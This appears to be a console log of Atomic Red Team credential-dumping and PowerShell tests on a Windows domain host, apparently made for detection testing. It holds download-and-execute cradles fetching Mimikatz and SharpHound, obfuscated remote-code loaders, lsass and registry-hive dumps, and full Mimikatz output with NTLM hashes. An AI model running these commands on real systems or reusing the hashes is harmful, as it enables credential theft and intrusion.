· 6 years ago · Sep 03, 2019, 11:21 AM
1Executing T1003 technique
2Attempting to run Atomic Techniques
3Tarcking UUID is T1003_atomictest
4Attempting to convert files from yaml
5path: C:\AtomicRedTeam\atomics\T1003\T1003.yaml
6file: C:\AtomicRedTeam\atomics\T1003\T1003.yaml
7Converting C:\AtomicRedTeam\atomics\T1003\T1003.yaml from Yaml
8Determining tests for Windows
9Determining manual tests
10[********BEGIN TEST*******]
11Credential Dumping T1003
12Powershell Mimikatz
13Dumps Credentials via Powershell by invoking a remote mimikatz script
14
15Replacing inputArgs with default values
16Invoking Atomic Tests using defined executor
17Performing the operation "Execute Atomic Test" on target "Powershell Mimikatz".
18PowerShell:
19 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_
20source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
21
22PowerShell
23 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_
24source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
25
26PowerShell ProcessID: 8256
27Calling Invoke-MemoryLoadLibrary
28Getting basic PE information from the file
29Allocating memory for the PE and write its headers to memory
30Getting detailed PE information from the headers loaded in memory
31StartAddress: 2309844172800 EndAddress: 2309845233664
32Copy PE sections in to memory
33Update memory addresses based on where the PE was actually loaded in memory
34Import DLL's needed by the PE we are loading
35Done importing DLL imports
36Update memory protection flags
37Calling dllmain so the DLL knows it has been loaded
38Calling function with WString return type
39Done unloading the libraries needed by the PE
40Calling dllmain so the DLL knows it is being unloaded
41Done!
42Hostname: it001.shire.com / S-1-5-21-47903322-2936176756-2312637138
43
44 .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02
45 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
46 ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
47 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
48 '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
49 '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
50
51mimikatz(powershell) # sekurlsa::logonpasswords
52
53Authentication Id : 0 ; 7380799 (00000000:00709f3f)
54Session : RemoteInteractive from 2
55User Name : pgustavo
56Domain : SHIRE
57Logon Server : HFDC1
58Logon Time : 9/3/2019 3:25:20 AM
59SID : S-1-5-21-47903322-2936176756-2312637138-1103
60 msv :
61 [00000003] Primary
62 * Username : pgustavo
63 * Domain : SHIRE
64 * NTLM : 5b1df8099db9998c12c045347d4f5bec
65 * SHA1 : 8940de5d45ff43c914abc826896fd5a6c129c594
66 * DPAPI : 7e9a064585994c7b35b29d2fe6f8dc46
67 tspkg :
68 wdigest :
69 * Username : pgustavo
70 * Domain : SHIRE
71 * Password : (null)
72 kerberos :
73 * Username : pgustavo
74 * Domain : SHIRE.COM
75 * Password : (null)
76 ssp :
77 credman :
78
79Authentication Id : 0 ; 7380564 (00000000:00709e54)
80Session : RemoteInteractive from 2
81User Name : pgustavo
82Domain : SHIRE
83Logon Server : HFDC1
84Logon Time : 9/3/2019 3:25:20 AM
85SID : S-1-5-21-47903322-2936176756-2312637138-1103
86 msv :
87 [00000003] Primary
88 * Username : pgustavo
89 * Domain : SHIRE
90 * NTLM : 5b1df8099db9998c12c045347d4f5bec
91 * SHA1 : 8940de5d45ff43c914abc826896fd5a6c129c594
92 * DPAPI : 7e9a064585994c7b35b29d2fe6f8dc46
93 tspkg :
94 wdigest :
95 * Username : pgustavo
96 * Domain : SHIRE
97 * Password : (null)
98 kerberos :
99 * Username : pgustavo
100 * Domain : SHIRE.COM
101 * Password : (null)
102 ssp :
103 credman :
104
105Authentication Id : 0 ; 7321894 (00000000:006fb926)
106Session : Interactive from 2
107User Name : DWM-2
108Domain : Window Manager
109Logon Server : (null)
110Logon Time : 9/3/2019 3:25:17 AM
111SID : S-1-5-90-0-2
112 msv :
113 [00000003] Primary
114 * Username : IT001$
115 * Domain : SHIRE
116 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
117 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
118 tspkg :
119 wdigest :
120 * Username : IT001$
121 * Domain : SHIRE
122 * Password : (null)
123 kerberos :
124 * Username : IT001$
125 * Domain : shire.com
126 * Password : 84 e3 c8 76 af 4d e0 27 f4 2d cb bf 6e ae 11 2d 9e b0 11 53 f0 78 f9 21 80 0f a7 99 f6 59 66 c2 ec cb e8 30 24 97 4b da 9c 02 4a 66 9a f1 82 93 b4 28 69 e8 6a 0d c3 73 c2 99 b8 8f 59 c5 22 20 47 3b 0a b1 cc 0d 7e fd 2c 69 f6 52 85 49 1f 10 9c 3c 7d ca 16 44 5f 9d b5 0b e9 4b 41 c2 9b df 87 7f 53 42 e2 dd 15 24 2e 3f 2d 6b c4 44 0d 36 80 fb 5b 1e 95 79 b0 e7 06 5a ee 72 78 6a 37 eb ae 62 4d 6b 05 d6 6b a9 ee 4d 2e 6c a8 47 56 61 e5 ac 32 a5 0c f8 28 3d 35 5b aa 7e b3 37 05 34 b2 1e 34 b1 ff 45 71 aa 62 6f 72 1b 45 51 36 3c d1 ef 20 2a bb df 0b e1 5b 6f 24 55 4e 8f 28 25 3b b5 34 b9 c8 fc 84 9d 38 a6 7f 65 99 f2 06 8b 2b 1b 59 04 3a 7b ff ba ed 01 93 a5 81 ed f2 b5 03 8e ce 13 f5 9a 88 2a a0 21 c2 54 a7 6e b4 46
127 ssp :
128 credman :
129
130Authentication Id : 0 ; 7321684 (00000000:006fb854)
131Session : Interactive from 2
132User Name : DWM-2
133Domain : Window Manager
134Logon Server : (null)
135Logon Time : 9/3/2019 3:25:17 AM
136SID : S-1-5-90-0-2
137 msv :
138 [00000003] Primary
139 * Username : IT001$
140 * Domain : SHIRE
141 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
142 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
143 tspkg :
144 wdigest :
145 * Username : IT001$
146 * Domain : SHIRE
147 * Password : (null)
148 kerberos :
149 * Username : IT001$
150 * Domain : shire.com
151 * Password : 84 e3 c8 76 af 4d e0 27 f4 2d cb bf 6e ae 11 2d 9e b0 11 53 f0 78 f9 21 80 0f a7 99 f6 59 66 c2 ec cb e8 30 24 97 4b da 9c 02 4a 66 9a f1 82 93 b4 28 69 e8 6a 0d c3 73 c2 99 b8 8f 59 c5 22 20 47 3b 0a b1 cc 0d 7e fd 2c 69 f6 52 85 49 1f 10 9c 3c 7d ca 16 44 5f 9d b5 0b e9 4b 41 c2 9b df 87 7f 53 42 e2 dd 15 24 2e 3f 2d 6b c4 44 0d 36 80 fb 5b 1e 95 79 b0 e7 06 5a ee 72 78 6a 37 eb ae 62 4d 6b 05 d6 6b a9 ee 4d 2e 6c a8 47 56 61 e5 ac 32 a5 0c f8 28 3d 35 5b aa 7e b3 37 05 34 b2 1e 34 b1 ff 45 71 aa 62 6f 72 1b 45 51 36 3c d1 ef 20 2a bb df 0b e1 5b 6f 24 55 4e 8f 28 25 3b b5 34 b9 c8 fc 84 9d 38 a6 7f 65 99 f2 06 8b 2b 1b 59 04 3a 7b ff ba ed 01 93 a5 81 ed f2 b5 03 8e ce 13 f5 9a 88 2a a0 21 c2 54 a7 6e b4 46
152 ssp :
153 credman :
154
155Authentication Id : 0 ; 7315630 (00000000:006fa0ae)
156Session : Interactive from 2
157User Name : UMFD-2
158Domain : Font Driver Host
159Logon Server : (null)
160Logon Time : 9/3/2019 3:25:17 AM
161SID : S-1-5-96-0-2
162 msv :
163 [00000003] Primary
164 * Username : IT001$
165 * Domain : SHIRE
166 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
167 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
168 tspkg :
169 wdigest :
170 * Username : IT001$
171 * Domain : SHIRE
172 * Password : (null)
173 kerberos :
174 * Username : IT001$
175 * Domain : shire.com
176 * Password : 84 e3 c8 76 af 4d e0 27 f4 2d cb bf 6e ae 11 2d 9e b0 11 53 f0 78 f9 21 80 0f a7 99 f6 59 66 c2 ec cb e8 30 24 97 4b da 9c 02 4a 66 9a f1 82 93 b4 28 69 e8 6a 0d c3 73 c2 99 b8 8f 59 c5 22 20 47 3b 0a b1 cc 0d 7e fd 2c 69 f6 52 85 49 1f 10 9c 3c 7d ca 16 44 5f 9d b5 0b e9 4b 41 c2 9b df 87 7f 53 42 e2 dd 15 24 2e 3f 2d 6b c4 44 0d 36 80 fb 5b 1e 95 79 b0 e7 06 5a ee 72 78 6a 37 eb ae 62 4d 6b 05 d6 6b a9 ee 4d 2e 6c a8 47 56 61 e5 ac 32 a5 0c f8 28 3d 35 5b aa 7e b3 37 05 34 b2 1e 34 b1 ff 45 71 aa 62 6f 72 1b 45 51 36 3c d1 ef 20 2a bb df 0b e1 5b 6f 24 55 4e 8f 28 25 3b b5 34 b9 c8 fc 84 9d 38 a6 7f 65 99 f2 06 8b 2b 1b 59 04 3a 7b ff ba ed 01 93 a5 81 ed f2 b5 03 8e ce 13 f5 9a 88 2a a0 21 c2 54 a7 6e b4 46
177 ssp :
178 credman :
179
180Authentication Id : 0 ; 997 (00000000:000003e5)
181Session : Service from 0
182User Name : LOCAL SERVICE
183Domain : NT AUTHORITY
184Logon Server : (null)
185Logon Time : 9/3/2019 3:08:27 AM
186SID : S-1-5-19
187 msv :
188 tspkg :
189 wdigest :
190 * Username : (null)
191 * Domain : (null)
192 * Password : (null)
193 kerberos :
194 * Username : (null)
195 * Domain : (null)
196 * Password : (null)
197 ssp :
198 credman :
199
200Authentication Id : 0 ; 53975 (00000000:0000d2d7)
201Session : Interactive from 1
202User Name : DWM-1
203Domain : Window Manager
204Logon Server : (null)
205Logon Time : 9/3/2019 3:08:27 AM
206SID : S-1-5-90-0-1
207 msv :
208 [00000003] Primary
209 * Username : IT001$
210 * Domain : SHIRE
211 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
212 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
213 tspkg :
214 wdigest :
215 * Username : IT001$
216 * Domain : SHIRE
217 * Password : (null)
218 kerberos :
219 * Username : IT001$
220 * Domain : shire.com
221 * Password : 84 e3 c8 76 af 4d e0 27 f4 2d cb bf 6e ae 11 2d 9e b0 11 53 f0 78 f9 21 80 0f a7 99 f6 59 66 c2 ec cb e8 30 24 97 4b da 9c 02 4a 66 9a f1 82 93 b4 28 69 e8 6a 0d c3 73 c2 99 b8 8f 59 c5 22 20 47 3b 0a b1 cc 0d 7e fd 2c 69 f6 52 85 49 1f 10 9c 3c 7d ca 16 44 5f 9d b5 0b e9 4b 41 c2 9b df 87 7f 53 42 e2 dd 15 24 2e 3f 2d 6b c4 44 0d 36 80 fb 5b 1e 95 79 b0 e7 06 5a ee 72 78 6a 37 eb ae 62 4d 6b 05 d6 6b a9 ee 4d 2e 6c a8 47 56 61 e5 ac 32 a5 0c f8 28 3d 35 5b aa 7e b3 37 05 34 b2 1e 34 b1 ff 45 71 aa 62 6f 72 1b 45 51 36 3c d1 ef 20 2a bb df 0b e1 5b 6f 24 55 4e 8f 28 25 3b b5 34 b9 c8 fc 84 9d 38 a6 7f 65 99 f2 06 8b 2b 1b 59 04 3a 7b ff ba ed 01 93 a5 81 ed f2 b5 03 8e ce 13 f5 9a 88 2a a0 21 c2 54 a7 6e b4 46
222 ssp :
223 credman :
224
225Authentication Id : 0 ; 53825 (00000000:0000d241)
226Session : Interactive from 1
227User Name : DWM-1
228Domain : Window Manager
229Logon Server : (null)
230Logon Time : 9/3/2019 3:08:27 AM
231SID : S-1-5-90-0-1
232 msv :
233 [00000003] Primary
234 * Username : IT001$
235 * Domain : SHIRE
236 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
237 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
238 tspkg :
239 wdigest :
240 * Username : IT001$
241 * Domain : SHIRE
242 * Password : (null)
243 kerberos :
244 * Username : IT001$
245 * Domain : shire.com
246 * Password : 84 e3 c8 76 af 4d e0 27 f4 2d cb bf 6e ae 11 2d 9e b0 11 53 f0 78 f9 21 80 0f a7 99 f6 59 66 c2 ec cb e8 30 24 97 4b da 9c 02 4a 66 9a f1 82 93 b4 28 69 e8 6a 0d c3 73 c2 99 b8 8f 59 c5 22 20 47 3b 0a b1 cc 0d 7e fd 2c 69 f6 52 85 49 1f 10 9c 3c 7d ca 16 44 5f 9d b5 0b e9 4b 41 c2 9b df 87 7f 53 42 e2 dd 15 24 2e 3f 2d 6b c4 44 0d 36 80 fb 5b 1e 95 79 b0 e7 06 5a ee 72 78 6a 37 eb ae 62 4d 6b 05 d6 6b a9 ee 4d 2e 6c a8 47 56 61 e5 ac 32 a5 0c f8 28 3d 35 5b aa 7e b3 37 05 34 b2 1e 34 b1 ff 45 71 aa 62 6f 72 1b 45 51 36 3c d1 ef 20 2a bb df 0b e1 5b 6f 24 55 4e 8f 28 25 3b b5 34 b9 c8 fc 84 9d 38 a6 7f 65 99 f2 06 8b 2b 1b 59 04 3a 7b ff ba ed 01 93 a5 81 ed f2 b5 03 8e ce 13 f5 9a 88 2a a0 21 c2 54 a7 6e b4 46
247 ssp :
248 credman :
249
250Authentication Id : 0 ; 996 (00000000:000003e4)
251Session : Service from 0
252User Name : IT001$
253Domain : SHIRE
254Logon Server : (null)
255Logon Time : 9/3/2019 3:08:27 AM
256SID : S-1-5-20
257 msv :
258 [00000003] Primary
259 * Username : IT001$
260 * Domain : SHIRE
261 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
262 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
263 tspkg :
264 wdigest :
265 * Username : IT001$
266 * Domain : SHIRE
267 * Password : (null)
268 kerberos :
269 * Username : it001$
270 * Domain : SHIRE.COM
271 * Password : (null)
272 ssp :
273 credman :
274
275Authentication Id : 0 ; 31603 (00000000:00007b73)
276Session : Interactive from 1
277User Name : UMFD-1
278Domain : Font Driver Host
279Logon Server : (null)
280Logon Time : 9/3/2019 3:08:26 AM
281SID : S-1-5-96-0-1
282 msv :
283 [00000003] Primary
284 * Username : IT001$
285 * Domain : SHIRE
286 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
287 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
288 tspkg :
289 wdigest :
290 * Username : IT001$
291 * Domain : SHIRE
292 * Password : (null)
293 kerberos :
294 * Username : IT001$
295 * Domain : shire.com
296 * Password : 84 e3 c8 76 af 4d e0 27 f4 2d cb bf 6e ae 11 2d 9e b0 11 53 f0 78 f9 21 80 0f a7 99 f6 59 66 c2 ec cb e8 30 24 97 4b da 9c 02 4a 66 9a f1 82 93 b4 28 69 e8 6a 0d c3 73 c2 99 b8 8f 59 c5 22 20 47 3b 0a b1 cc 0d 7e fd 2c 69 f6 52 85 49 1f 10 9c 3c 7d ca 16 44 5f 9d b5 0b e9 4b 41 c2 9b df 87 7f 53 42 e2 dd 15 24 2e 3f 2d 6b c4 44 0d 36 80 fb 5b 1e 95 79 b0 e7 06 5a ee 72 78 6a 37 eb ae 62 4d 6b 05 d6 6b a9 ee 4d 2e 6c a8 47 56 61 e5 ac 32 a5 0c f8 28 3d 35 5b aa 7e b3 37 05 34 b2 1e 34 b1 ff 45 71 aa 62 6f 72 1b 45 51 36 3c d1 ef 20 2a bb df 0b e1 5b 6f 24 55 4e 8f 28 25 3b b5 34 b9 c8 fc 84 9d 38 a6 7f 65 99 f2 06 8b 2b 1b 59 04 3a 7b ff ba ed 01 93 a5 81 ed f2 b5 03 8e ce 13 f5 9a 88 2a a0 21 c2 54 a7 6e b4 46
297 ssp :
298 credman :
299
300Authentication Id : 0 ; 31502 (00000000:00007b0e)
301Session : Interactive from 0
302User Name : UMFD-0
303Domain : Font Driver Host
304Logon Server : (null)
305Logon Time : 9/3/2019 3:08:26 AM
306SID : S-1-5-96-0-0
307 msv :
308 [00000003] Primary
309 * Username : IT001$
310 * Domain : SHIRE
311 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
312 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
313 tspkg :
314 wdigest :
315 * Username : IT001$
316 * Domain : SHIRE
317 * Password : (null)
318 kerberos :
319 * Username : IT001$
320 * Domain : shire.com
321 * Password : 84 e3 c8 76 af 4d e0 27 f4 2d cb bf 6e ae 11 2d 9e b0 11 53 f0 78 f9 21 80 0f a7 99 f6 59 66 c2 ec cb e8 30 24 97 4b da 9c 02 4a 66 9a f1 82 93 b4 28 69 e8 6a 0d c3 73 c2 99 b8 8f 59 c5 22 20 47 3b 0a b1 cc 0d 7e fd 2c 69 f6 52 85 49 1f 10 9c 3c 7d ca 16 44 5f 9d b5 0b e9 4b 41 c2 9b df 87 7f 53 42 e2 dd 15 24 2e 3f 2d 6b c4 44 0d 36 80 fb 5b 1e 95 79 b0 e7 06 5a ee 72 78 6a 37 eb ae 62 4d 6b 05 d6 6b a9 ee 4d 2e 6c a8 47 56 61 e5 ac 32 a5 0c f8 28 3d 35 5b aa 7e b3 37 05 34 b2 1e 34 b1 ff 45 71 aa 62 6f 72 1b 45 51 36 3c d1 ef 20 2a bb df 0b e1 5b 6f 24 55 4e 8f 28 25 3b b5 34 b9 c8 fc 84 9d 38 a6 7f 65 99 f2 06 8b 2b 1b 59 04 3a 7b ff ba ed 01 93 a5 81 ed f2 b5 03 8e ce 13 f5 9a 88 2a a0 21 c2 54 a7 6e b4 46
322 ssp :
323 credman :
324
325Authentication Id : 0 ; 30228 (00000000:00007614)
326Session : UndefinedLogonType from 0
327User Name : (null)
328Domain : (null)
329Logon Server : (null)
330Logon Time : 9/3/2019 3:08:26 AM
331SID :
332 msv :
333 [00000003] Primary
334 * Username : IT001$
335 * Domain : SHIRE
336 * NTLM : d0bdd8fb6d2825bb0eac22f3b2f1729f
337 * SHA1 : ac8683dd23cd614006b731564cd531e8b58691e4
338 tspkg :
339 wdigest :
340 kerberos :
341 ssp :
342 credman :
343
344Authentication Id : 0 ; 999 (00000000:000003e7)
345Session : UndefinedLogonType from 0
346User Name : IT001$
347Domain : SHIRE
348Logon Server : (null)
349Logon Time : 9/3/2019 3:08:26 AM
350SID : S-1-5-18
351 msv :
352 tspkg :
353 wdigest :
354 * Username : IT001$
355 * Domain : SHIRE
356 * Password : (null)
357 kerberos :
358 * Username : it001$
359 * Domain : SHIRE.COM
360 * Password : (null)
361 ssp :
362 credman :
363
364mimikatz(powershell) # exit
365Bye!
366
367Determining tests for Windows
368Determining manual tests
369[********BEGIN TEST*******]
370Credential Dumping T1003
371Gsecdump
372https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
373
374Invoking Atomic Tests using defined executor
375Performing the operation "Execute Atomic Test" on target "Gsecdump".
376Command Prompt:
377 gsecdump -a
378
379Command Prompt:
380 gsecdump -a
381
382cmd.exe : 'gsecdump' is not recognized as an internal or external command,
383At line:1 char:1
384+ cmd.exe /c "gsecdump -a"
385+ ~~~~~~~~~~~~~~~~~~~~~~~~
386 + CategoryInfo : NotSpecified: ('gsecdump' is n...ternal command,:String) [], RemoteException
387 + FullyQualifiedErrorId : NativeCommandError
388
389operable program or batch file.
390
391Determining tests for Windows
392Determining manual tests
393[********BEGIN TEST*******]
394Credential Dumping T1003
395Windows Credential Editor
396http://www.ampliasecurity.com/research/windows-credentials-editor/
397
398Replacing inputArgs with default values
399Invoking Atomic Tests using defined executor
400Performing the operation "Execute Atomic Test" on target "Windows Credential Editor".
401Command Prompt:
402 wce -o output.txt
403
404Command Prompt:
405 wce -o output.txt
406
407cmd.exe : 'wce' is not recognized as an internal or external command,
408At line:1 char:1
409+ cmd.exe /c "wce -o output.txt"
410+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
411 + CategoryInfo : NotSpecified: ('wce' is not re...ternal command,:String) [], RemoteException
412 + FullyQualifiedErrorId : NativeCommandError
413
414operable program or batch file.
415
416Determining tests for Windows
417Determining manual tests
418[********BEGIN TEST*******]
419Credential Dumping T1003
420Registry dump of SAM, creds, and secrets
421Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
422via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
423
424Invoking Atomic Tests using defined executor
425Performing the operation "Execute Atomic Test" on target "Registry dump of SAM, creds, and secrets".
426Command Prompt:
427 reg save HKLM\sam sam
428reg save HKLM\system system
429reg save HKLM\security security
430
431Command Prompt:
432 reg save HKLM\sam sam
433reg save HKLM\system system
434reg save HKLM\security security
435
436The operation completed successfully.
437
438The operation completed successfully.
439
440The operation completed successfully.
441
442Determining tests for Windows
443Determining manual tests
444[********BEGIN TEST*******]
445Credential Dumping T1003
446Dump LSASS.exe Memory using ProcDump
447The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
448ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
449
450Replacing inputArgs with default values
451Invoking Atomic Tests using defined executor
452Performing the operation "Execute Atomic Test" on target "Dump LSASS.exe Memory using ProcDump".
453Command Prompt:
454 procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp
455
456Command Prompt:
457 procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp
458
459
460ProcDump v9.0 - Sysinternals process dump utility
461Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
462Sysinternals - www.sysinternals.com
463
464[03:45:08] Dump 1 initiated: C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\lsass_dump.dmp
465[03:45:08] Dump 1 writing: Estimated dump file size is 46 MB.
466[03:45:09] Dump 1 complete: 46 MB written in 1.0 seconds
467[03:45:09] Dump count reached.
468
469Determining tests for Windows
470Determining manual tests
471Unable to run manual tests
472Determining tests for Windows
473Determining manual tests
474Unable to run manual tests
475Determining tests for Windows
476Determining manual tests
477[********BEGIN TEST*******]
478Credential Dumping T1003
479Dump Active Directory Database with NTDSUtil
480The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This
481capability
482uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
483subsequent domain controllers without the need of network-based replication.
484
485Replacing inputArgs with default values
486Invoking Atomic Tests using defined executor
487Performing the operation "Execute Atomic Test" on target "Dump Active Directory Database with NTDSUtil".
488Command Prompt:
489 ntdsutil "ac i ntds" "ifm" "create full C:\AtomicRedTeam" q q
490
491Command Prompt:
492 ntdsutil "ac i ntds" "ifm" "create full C:\AtomicRedTeam" q q
493
494cmd.exe : 'ntdsutil' is not recognized as an internal or external command,
495At line:1 char:1
496+ cmd.exe /c "ntdsutil "ac i ntds" "ifm" "create full C:\AtomicRedTeam" ...
497+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
498 + CategoryInfo : NotSpecified: ('ntdsutil' is n...ternal command,:String) [], RemoteException
499 + FullyQualifiedErrorId : NativeCommandError
500
501operable program or batch file.
502
503Determining tests for Windows
504Determining manual tests
505[********BEGIN TEST*******]
506Credential Dumping T1003
507Create Volume Shadow Copy with NTDS.dit
508The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
509
510Replacing inputArgs with default values
511Invoking Atomic Tests using defined executor
512Performing the operation "Execute Atomic Test" on target "Create Volume Shadow Copy with NTDS.dit".
513Command Prompt:
514 vssadmin.exe create shadow /for=C:
515
516Command Prompt:
517 vssadmin.exe create shadow /for=C:
518
519vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
520(C) Copyright 2001-2013 Microsoft Corp.
521
522Error: Invalid command.
523
524---- Commands Supported ----
525
526Delete Shadows - Delete volume shadow copies
527List Providers - List registered volume shadow copy providers
528List Shadows - List existing volume shadow copies
529List ShadowStorage - List volume shadow copy storage associations
530List Volumes - List volumes eligible for shadow copies
531List Writers - List subscribed volume shadow copy writers
532Resize ShadowStorage - Resize a volume shadow copy storage association
533Determining tests for Windows
534Determining manual tests
535[********BEGIN TEST*******]
536Credential Dumping T1003
537Copy NTDS.dit from Volume Shadow Copy
538The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
539
540This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
541A successful test also requires the export of the SYSTEM Registry hive.
542This test must be executed on a Windows Domain Controller.
543
544Replacing inputArgs with default values
545Invoking Atomic Tests using defined executor
546Performing the operation "Execute Atomic Test" on target "Copy NTDS.dit from Volume Shadow Copy".
547Command Prompt:
548 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
549copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
550reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE
551Command Prompt:
552 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
553copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
554reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE
555The system cannot find the path specified.
556The system cannot find the path specified.
557cmd.exe : ERROR: The system was unable to find the specified registry key or value.
558At line:1 char:1
559+ cmd.exe /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"
560+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
561 + CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
562 + FullyQualifiedErrorId : NativeCommandError
563
564[!!!!!!!!END TEST!!!!!!!]
565
566
567Executing T1086 technique
568Attempting to run Atomic Techniques
569Tarcking UUID is T1086_atomictest
570Attempting to convert files from yaml
571path: C:\AtomicRedTeam\atomics\T1086\T1086.yaml
572file: C:\AtomicRedTeam\atomics\T1086\T1086.yaml
573Converting C:\AtomicRedTeam\atomics\T1086\T1086.yaml from Yaml
574Determining tests for Windows
575Determining manual tests
576[********BEGIN TEST*******]
577PowerShell T1086
578Mimikatz
579Download Mimikatz and dump credentials
580
581Replacing inputArgs with default values
582Invoking Atomic Tests using defined executor
583Performing the operation "Execute Atomic Test" on target "Mimikatz".
584Command Prompt:
585 powershell.exe 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerS
586ploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds'
587
588Command Prompt:
589 powershell.exe 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerS
590ploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds'
591
592IEX (New-Object Net.WebClient).DownloadString( https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds
593Determining tests for Windows
594Determining manual tests
595[********BEGIN TEST*******]
596PowerShell T1086
597BloodHound
598Download Bloodhound and run it
599
600Replacing inputArgs with default values
601Invoking Atomic Tests using defined executor
602Performing the operation "Execute Atomic Test" on target "BloodHound".
603Command Prompt:
604 powershell.exe 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BloodHoundAD/BloodHou
605nd/master/Ingestors/SharpHound.ps1"); Invoke-BloodHound'
606
607Command Prompt:
608 powershell.exe 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BloodHoundAD/BloodHou
609nd/master/Ingestors/SharpHound.ps1"); Invoke-BloodHound'
610
611IEX (New-Object Net.WebClient).DownloadString( https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1); Invoke-BloodHound
612Determining tests for Windows
613Determining manual tests
614[********BEGIN TEST*******]
615PowerShell T1086
616Obfuscation Tests
617Different obfuscated methods to test
618Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
619
620Invoking Atomic Tests using defined executor
621Performing the operation "Execute Atomic Test" on target "Obfuscation Tests".
622PowerShell:
623 (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::Rea
624dAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
625(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Jo
626in([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
627Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH
628'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsO
629bject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM
630|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J
631((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem
632Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&(
633''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
634
635PowerShell
